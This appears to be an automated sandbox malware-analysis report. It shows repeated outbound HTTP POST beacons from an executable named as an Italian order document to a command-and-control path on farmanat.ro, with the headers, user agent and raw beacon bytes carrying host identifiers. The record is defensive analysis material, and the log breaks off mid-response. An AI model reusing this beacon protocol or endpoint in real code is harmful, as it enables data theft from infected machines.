                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              835192.168.11.2050683176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:10.499800920 CET7465OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:10.533844948 CET7465OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:10.597724915 CET7465INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:09 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              836192.168.11.2050684176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:11.026772976 CET7466OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:11.060522079 CET7466OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:11.110959053 CET7467INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:10 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              837192.168.11.2050685176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:11.540230036 CET7467OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:11.574536085 CET7468OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:11.624141932 CET7468INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:10 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              838192.168.11.2050686176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:12.060169935 CET7469OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:12.094419003 CET7469OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:12.146275997 CET7469INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              839192.168.11.2050687176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:12.564542055 CET7470OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:12.598675966 CET7470OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:12.648529053 CET7471INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              84192.168.11.2049921176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:53.244343996 CET6431OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:53.278525114 CET6431OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:53.329240084 CET6432INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:52 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              840192.168.11.2050688176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:13.073925972 CET7471OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:13.107731104 CET7471OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:13.157313108 CET7472INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:12 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              841192.168.11.2050689176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:13.588603973 CET7473OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:13.622864008 CET7473OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:13.673353910 CET7473INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:12 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              842192.168.11.2050690176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:14.101732016 CET7474OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:14.135425091 CET7474OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:14.191421986 CET7475INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:13 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              843192.168.11.2050691176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:14.619405031 CET7475OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:14.653337955 CET7475OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:14.703444958 CET7476INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:13 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              844192.168.11.2050692176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:15.119360924 CET7477OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:15.152946949 CET7477OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:15.205034971 CET7477INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:14 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              845192.168.11.2050693176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:15.607177973 CET7478OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:15.641587973 CET7478OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:15.692130089 CET7479INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:14 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              846192.168.11.2050694176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:16.105694056 CET7479OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:16.140073061 CET7479OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:16.196391106 CET7480INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:15 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              847192.168.11.2050695176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:16.623550892 CET7481OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:16.657157898 CET7481OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:16.709078074 CET7481INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:15 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              848192.168.11.2050696176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:17.136322021 CET7482OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:17.169868946 CET7482OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:17.227396965 CET7482INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              849192.168.11.2050697176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:17.661093950 CET7483OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:17.695328951 CET7483OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:17.746172905 CET7484INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              85192.168.11.2049922176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:53.818084002 CET6433OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:53.852293015 CET6433OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:53.902612925 CET6433INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:52 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              850192.168.11.2050698176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:18.167114019 CET7485OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:18.201083899 CET7485OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:18.251601934 CET7485INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:17 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              851192.168.11.2050699176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:18.649872065 CET7486OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:18.683384895 CET7486OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:18.732243061 CET7486INHTTP/1.1 404 Not Found
                                              Server: nginx
